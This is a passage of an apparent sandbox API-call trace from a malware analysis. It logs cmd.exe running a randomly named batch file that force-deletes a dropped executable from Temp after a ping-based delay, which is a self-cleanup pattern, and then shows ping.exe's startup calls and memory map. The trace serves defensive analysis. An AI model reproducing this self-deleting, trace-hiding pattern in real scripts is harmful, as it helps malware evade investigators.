_BufferCount=0x3fe, _Format="%s", _ArgList=0x28f218 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0112.414] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x28f218 | out: _Buffer=">") returned 1 [0112.414] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.414] GetFileType (hFile=0x7) returned 0x2 [0112.414] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0112.414] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f1e0 | out: lpMode=0x28f1e0) returned 1 [0112.414] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.414] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x28f20c, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x28f20c*=0x19) returned 1 [0112.414] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.414] GetFileType (hFile=0x7) returned 0x2 [0112.414] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0112.414] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f464 | out: lpMode=0x28f464) returned 1 [0112.415] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.415] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x33f008*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x28f490, lpReserved=0x0 | out: lpBuffer=0x33f008*, lpNumberOfCharsWritten=0x28f490*=0x3) returned 1 [0112.415] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x28f49c | out: _Buffer=" /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" ") returned 58 [0112.415] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.415] GetFileType (hFile=0x7) returned 0x2 [0112.415] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0112.415] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f45c | out: lpMode=0x28f45c) returned 1 [0112.415] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.415] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x3a, lpNumberOfCharsWritten=0x28f488, lpReserved=0x0 
| out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f488*=0x3a) returned 1 [0112.415] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f4bc | out: _Buffer="\r\n") returned 2 [0112.415] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.415] GetFileType (hFile=0x7) returned 0x2 [0112.416] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0112.416] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f47c | out: lpMode=0x28f47c) returned 1 [0112.416] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.416] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f4a8, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f4a8*=0x2) returned 1 [0112.416] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0112.416] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0112.416] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0112.416] GetConsoleTitleW (in: lpConsoleTitle=0x28f02c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0112.416] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x28e0a4, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x28e0a8, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x28e0a4*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0112.416] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0112.417] _wcsicmp (_String1="F8a3iwA6.exe", _String2=".") returned 56 [0112.417] _wcsicmp (_String1="F8a3iwA6.exe", _String2="..") returned 56 [0112.417] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\f8a3iwa6.exe")) returned 0xffffffff [0112.417] GetLastError () returned 0x2 [0112.417] GetFileAttributesW 
(lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp")) returned 0x2010 [0112.417] _wcsicmp (_String1="F8a3iwA6.exe", _String2=".") returned 56 [0112.417] _wcsicmp (_String1="F8a3iwA6.exe", _String2="..") returned 56 [0112.417] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\f8a3iwa6.exe")) returned 0xffffffff [0112.417] GetLastError () returned 0x2 [0112.417] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe", fInfoLevelId=0x0, lpFindFileData=0x340554, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x340554) returned 0xffffffff [0112.417] GetLastError () returned 0x2 [0112.417] _get_osfhandle (_FileHandle=2) returned 0xb [0112.417] GetFileType (hFile=0xb) returned 0x2 [0112.417] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0112.418] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28eaa4 | out: lpMode=0x28eaa4) returned 1 [0112.418] _get_osfhandle (_FileHandle=2) returned 0xb [0112.418] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x28ead8 | out: lpConsoleScreenBufferInfo=0x28ead8) returned 1 [0112.418] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0112.418] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.418] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0112.419] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.419] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0112.419] _get_osfhandle (_FileHandle=0) returned 0x3 [0112.419] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0112.419] SetConsoleInputExeNameW () returned 0x1 [0112.419] 
GetConsoleOutputCP () returned 0x1b5 [0112.419] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0112.419] SetThreadUILanguage (LangId=0x0) returned 0x409 [0112.419] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\Gy2dwmVF.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\gy2dwmvf.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x28f464, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0112.419] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0112.419] _get_osfhandle (_FileHandle=3) returned 0x54 [0112.419] SetFilePointer (in: hFile=0x54, lDistanceToMove=145, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0112.420] _get_osfhandle (_FileHandle=3) returned 0x54 [0112.420] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0112.420] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x28f448, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x28f448*=0x0, lpOverlapped=0x0) returned 1 [0112.420] GetLastError () returned 0x0 [0112.420] _get_osfhandle (_FileHandle=3) returned 0x54 [0112.420] GetFileType (hFile=0x54) returned 0x1 [0112.420] _get_osfhandle (_FileHandle=3) returned 0x54 [0112.420] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0112.420] _get_osfhandle (_FileHandle=3) returned 0x54 [0112.420] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0112.420] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x28f42c, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, 
lpNumberOfBytesRead=0x28f42c*=0x0, lpOverlapped=0x0) returned 1 [0112.420] GetLastError () returned 0x0 [0112.420] _get_osfhandle (_FileHandle=3) returned 0x54 [0112.420] GetFileType (hFile=0x54) returned 0x1 [0112.420] _get_osfhandle (_FileHandle=3) returned 0x54 [0112.420] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0112.421] longjmp () [0112.421] _tell (_FileHandle=3) returned 145 [0112.421] _close (_FileHandle=3) returned 0 [0112.421] CmdBatNotification () returned 0x0 [0112.421] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.421] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0112.421] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.421] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0112.421] _get_osfhandle (_FileHandle=0) returned 0x3 [0112.421] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0112.421] SetConsoleInputExeNameW () returned 0x1 [0112.421] GetConsoleOutputCP () returned 0x1b5 [0112.421] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0112.421] SetThreadUILanguage (LangId=0x0) returned 0x409 [0112.422] exit (_Code=0) Process: id = "37" image_name = "ping.exe" filename = "c:\\windows\\system32\\ping.exe" page_root = "0x7ea16660" os_pid = "0xcfc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "35" os_parent_pid = "0xccc" cmd_line = "ping -n 3 localhost" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" 
[0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5595 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5596 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5597 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5598 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 5599 start_va = 0xbf0000 end_va = 0xbf7fff entry_point = 0xbf0000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\System32\\PING.EXE" (normalized: "c:\\windows\\system32\\ping.exe") Region: id = 5600 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5601 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5602 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 5603 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 5604 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 5609 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5610 start_va = 0x20000 
end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 5611 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 5612 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5613 start_va = 0x320000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 5614 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 5615 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 5616 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5617 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5618 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 5619 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 
5620 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5621 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 5622 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5623 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 5624 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 5625 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 5626 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5627 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 5628 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 5629 start_va = 
0x230000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 5630 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 5631 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 5632 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 5633 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 5634 start_va = 0x1e0000 end_va = 0x1e2fff entry_point = 0x1e0000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\System32\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\ping.exe.mui") Region: id = 5635 start_va = 0x300000 end_va = 0x300fff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 5636 start_va = 0x310000 end_va = 0x310fff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 5637 start_va = 0x330000 end_va = 0x430fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 5638 start_va = 0xc00000 end_va = 0x17fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c00000" filename = "" Region: id = 5639 start_va = 0x440000 end_va = 0x70efff entry_point = 0x440000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 
5640 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 5641 start_va = 0x710000 end_va = 0x90ffff entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 5642 start_va = 0x74960000 end_va = 0x74964fff entry_point = 0x74960000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 5643 start_va = 0x74e00000 end_va = 0x74e05fff entry_point = 0x74e00000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 5644 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 5645 start_va = 0x710000 end_va = 0x76ffff entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 5646 start_va = 0x8d0000 end_va = 0x90ffff entry_point = 0x0 region_type = private name = "private_0x00000000008d0000" filename = "" Region: id = 5647 start_va = 0x960000 end_va = 0x99ffff entry_point = 0x0 region_type = private name = "private_0x0000000000960000" filename = "" Region: id = 5648 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 5649 start_va = 0x704a0000 end_va = 0x704a5fff entry_point = 0x704a0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 5650 start_va = 0x736b0000 end_va = 0x736e7fff entry_point = 0x736b0000 region_type = mapped_file name = "fwpuclnt.dll" 
filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 5651 start_va = 0x770000 end_va = 0x87ffff entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 5743 start_va = 0xa20000 end_va = 0xa5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a20000" filename = "" Region: id = 5744 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 5879 start_va = 0x9e0000 end_va = 0xa1ffff entry_point = 0x0 region_type = private name = "private_0x00000000009e0000" filename = "" Region: id = 5880 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Thread: id = 59 os_tid = 0xd00 [0109.313] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22ff24 | out: lpSystemTimeAsFileTime=0x22ff24*(dwLowDateTime=0x7f291320, dwHighDateTime=0x1d440a9)) [0109.313] GetCurrentProcessId () returned 0xcfc [0109.313] GetCurrentThreadId () returned 0xd00 [0109.313] GetTickCount () returned 0x26299 [0109.313] QueryPerformanceCounter (in: lpPerformanceCount=0x22ff1c | out: lpPerformanceCount=0x22ff1c*=16610244257) returned 1 [0109.314] GetModuleHandleA (lpModuleName=0x0) returned 0xbf0000 [0109.314] __set_app_type (_Type=0x1) [0109.314] __p__fmode () returned 0x76b331f4 [0109.314] __p__commode () returned 0x76b331fc [0109.314] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xbf2ae1) returned 0x0 [0109.314] __getmainargs (in: _Argc=0xbf50d4, _Argv=0xbf50dc, _Env=0xbf50d8, _DoWildCard=0, _StartInfo=0xbf50e8 | out: _Argc=0xbf50d4, _Argv=0xbf50dc, _Env=0xbf50d8) returned 0 [0109.314] SetThreadUILanguage (LangId=0x0) returned 0x409 [0109.317] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0109.317] WSAStartup (in: 
wVersionRequired=0x2, lpWSAData=0xbf5440 | out: lpWSAData=0xbf5440) returned 0 [0109.324] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0x22f9b4 | out: phkResult=0x22f9b4*=0x58) returned 0x0 [0109.324] RegQueryValueExA (in: hKey=0x58, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0x22f9a8, lpData=0x22f9b0, lpcbData=0x22f9ac*=0x4 | out: lpType=0x22f9a8*=0x0, lpData=0x22f9b0*=0x0, lpcbData=0x22f9ac*=0x4) returned 0x2 [0109.324] RegCloseKey (hKey=0x58) returned 0x0 [0109.325] getaddrinfo (in: pNodeName="localhost", pServiceName=0x0, pHints=0x22f97c*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x22f9a4 | out: ppResult=0x22f9a4*=0x0) returned 11001 [0109.325] getaddrinfo (in: pNodeName="localhost", pServiceName=0x0, pHints=0x22f97c*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x22f9a4 | out: ppResult=0x22f9a4*=0x946f0*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="cRh2YWu7", ai_addr=0x947b8*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0x947e0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x93a18*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0))) returned 0 [0109.507] FreeAddrInfoW (pAddrInfo=0x946f0*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="剣㉨坙㝵", ai_addr=0x947b8*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0x947e0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x93a18*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0))) 
[0109.507] Icmp6CreateFile () returned 0x98b40 [0109.653] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x94830 [0109.653] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0x9ebb0 [0109.653] getnameinfo (in: pSockaddr=0xbf55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x22fea4, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0109.653] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2720, dwLanguageId=0x0, lpBuffer=0x22f9a4, nSize=0x0, Arguments=0x22f9a0 | out: lpBuffer="XH\x09") returned 0x19 [0109.653] CharToOemBuffA (in: lpszSrc="\r\nPinging cRh2YWu7 [::1] ", lpszDst=0x94858, cchDstLength=0x19 | out: lpszDst="\r\nPinging cRh2YWu7 [::1] ") returned 1 [0109.653] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0109.653] _write (in: _FileHandle=1, _Buf=0x94858*, _MaxCharCount=0x19 | out: _Buf=0x94858*) returned 25 [0109.653] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0109.654] LocalFree (hMem=0x94858) returned 0x0 [0109.654] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0x22f9a8, nSize=0x0, Arguments=0x22f9a4 | out: lpBuffer="XH\x09") returned 0x18 [0109.654] CharToOemBuffA (in: lpszSrc="with 32 bytes of data:\r\n", lpszDst=0x94858, cchDstLength=0x18 | out: lpszDst="with 32 bytes of data:\r\n") returned 1 [0109.654] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0109.654] _write (in: _FileHandle=1, _Buf=0x94858*, _MaxCharCount=0x18 | out: _Buf=0x94858*) returned 24 [0109.654] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0109.654] LocalFree (hMem=0x94858) returned 0x0 [0109.654] SetConsoleCtrlHandler (HandlerRoutine=0xbf17ca, Add=1) returned 1 [0109.654] Icmp6SendEcho2 (in: IcmpHandle=0x98b40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x22fa20, 
DestinationAddress=0xbf55e0, RequestData=0x94830, RequestSize=0x20, RequestOptions=0x22f9d0, ReplyBuffer=0x9ebb0, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x9ebb0) returned 0x1 [0109.655] getnameinfo (in: pSockaddr=0xbf55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x22fea4, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0109.655] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x22f9a8, nSize=0x0, Arguments=0x22f9a4 | out: lpBuffer=" Q\x09") returned 0x10 [0109.655] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x95120, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0109.655] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0109.655] _write (in: 